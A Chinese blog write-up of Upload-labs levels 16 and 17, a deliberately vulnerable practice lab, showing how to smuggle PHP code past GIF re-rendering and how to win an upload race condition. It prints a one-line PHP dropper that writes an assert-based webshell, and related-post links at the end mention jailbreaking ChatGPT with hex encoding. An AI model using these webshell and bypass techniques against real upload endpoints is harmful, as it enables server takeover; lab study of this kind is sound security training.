Upload-labs十六和十七关

目录

第十六关

直接上传php文件判断限制方式:

同第十五关白名单限制

第十六关源码:

代码逻辑判断了后缀名、content-type,以及利用imagecreatefromgif判断是否为gif图片,最后再做了一次二次渲染

第71行检测 f i l e e x t 和 fileext和 fileext和filetype是否为gif格式.

然后73行使用move_uploaded_file函数来做判断条件,如果成功将文件移动到$target_path,就会进入二次渲染的代码,反之上传失败.

在这里有一个问题,如果作者是想考察绕过二次渲染的话,在move_uploaded_file( t m p n a m e , tmpname, tmpname,target_path)返回true的时候,就已经成功将图片马上传到服务器了,所以下面的二次渲染并不会影响到图片马的上传.如果是想考察文件后缀和content-type的话,那么二次渲染的代码就很多余.(到底考点在哪里,只有作者清楚.哈哈)

由于在二次渲染时重新生成了文件名,所以可以根据上传后的文件名,来判断上传的图片是二次渲染后生成的图片还是直接由move_uploaded_file函数移动的图片.

我看过的writeup都是直接由move_uploaded_file函数上传的图片马.今天我们把move_uploaded_file这个判断条件去除,然后尝试上传图片马.

上传gif

将<?php phpinfo(); ?>添加到gif的尾部.

成功上传含有一句话的111.gif,但是这并没有成功.我们将上传的图片下载到本地.

可以看到下载下来的文件名已经变化,所以这是经过二次渲染的图片.我们使用16进制编辑器将其打开

可以发现,我们在gif末端添加的php代码已经被去除.

关于绕过gif的二次渲染,我们只需要找到渲染前后没有变化的位置,然后将php代码写进去,就可以成功上传带有php代码的图片了.

经过对比,蓝色部分是没有发生变化的

我们将代码写到该位置.

上传后在下载到本地使用16进制编辑器打开,可以看到php代码没有被去除.成功上传图片马

绕过思路:

1、把经过二次渲染的图片进行捆绑webshell图片马,文件上传时候 文件名为.gif后缀、文件类型content-type:image/gif、文件头GIF89a

推荐使用gif格式,十六进制编辑图片文件找到二次渲染未修改的图片区域插入一句话木马

第十七关

第十七关源码:

代码逻辑:

这里先将文件上传到服务器,然后通过rename修改名称,再通过unlink删除文件,因此可以通过条件竞争的方式在unlink之前,访问webshell

绕过思路:

1、条件竞争绕过上传webshell

上传一个fputs写入shell文件功能的webshell,通过python或者burpsuite访问该文件

f.php文件内容
<?php fputs(fopen('shell.php','w'),'<?php @assert($_POST[c]);?>'); ?>

burpsuite抓包:通过爆破形式不断的进行文件上传

burpsuite抓包:通过爆破形式不断的访问该文件

相关推荐
星尘安全8 小时前
安全工程师入侵加密货币交易所获罪
安全·区块链·漏洞·加密货币
渗透测试老鸟-九青2 天前
【$15000】 通过监控调试模式实现RCE
安全·web安全·网络安全·渗透·漏洞
星尘安全8 天前
ChatGPT 越狱:研究人员使用十六进制编码和表情符号绕过 AI 保护措施
人工智能·安全·网络安全·chatgpt·漏洞
网络研究院9 天前
新工具可绕过 Google Chrome 的新 Cookie 加密系统
前端·chrome·系统·漏洞·加密·绕过
SouthBay49312 天前
【Vulnhub靶场】DC-5
linux·web安全·渗透测试·漏洞·vulnhub靶场
SouthBay49312 天前
【Vulnhub靶场】DC-2
渗透测试·漏洞·1024程序员节·vulnhub靶场
星尘安全12 天前
【ChatGPT插件漏洞三连发之一】未授权恶意插件安装
安全·网络安全·chatgpt·漏洞·插件
SouthBay49314 天前
【Vulhub靶场】 DC-3
web安全·渗透测试·漏洞·vulhub靶场
悟道子HD14 天前
守则与术语(网安)
测试工具·安全·网络安全·漏洞·hacker·1024程序员节·src